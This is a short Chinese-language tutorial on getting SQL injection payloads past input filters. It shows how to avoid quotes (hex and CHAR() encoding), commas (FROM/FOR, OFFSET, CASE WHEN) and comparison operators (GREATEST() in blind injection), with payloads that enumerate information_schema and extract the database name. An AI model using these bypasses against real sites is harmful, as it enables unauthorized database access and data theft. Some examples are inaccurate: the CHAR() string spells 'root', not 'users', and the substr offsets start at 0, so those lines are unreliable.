特殊符号绕过

一、引号绕过

select column_name from information_schema.tables where table_name="users"
------>
select column_name from information_schema.tables where table_name=0x7573657273
------>
select column_name from information_schema.tables where table_name=Char(114, 111, 111, 116)
小结:使用十六进制可以绕过引号

二、逗号绕过

在使用盲注的时候,需要使用到substr() ,mid() ,limit。这些子句方法都需要使用到逗号。对于substr()mid()这两个方法可以使用from to的方式来解决。

substr('test',1,1)
------>
substr('test' from 1 for 1)​

对于limit可以使用offset来绕过。

select * from news limit 0,1
------>
select * from news limit 1 offset 0

if(1=1,1,0)可用case when 1=1 then 1 else 0 end 代替​

if(1=1,1,0)
------>
case when 1=1 then 1 else 0  end

小结:使用from可以绕过逗号

三、比较符(<,>)绕过

同样是在使用盲注的时候,在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符,那么就需要使用到greatest来进行绕过了。

最常见的一个盲注的sql语句。

select * from users where id=1 and ascii(substr(database(),0,1))>64

此时如果比较操作符被过滤,上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,等)函数返回输入参数(n1,n2,n3,等)的最大值。

那么上面的这条sql语句可以使用greatest变为如下的子句:

select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

小结:使用greatest()绕过比较操作符。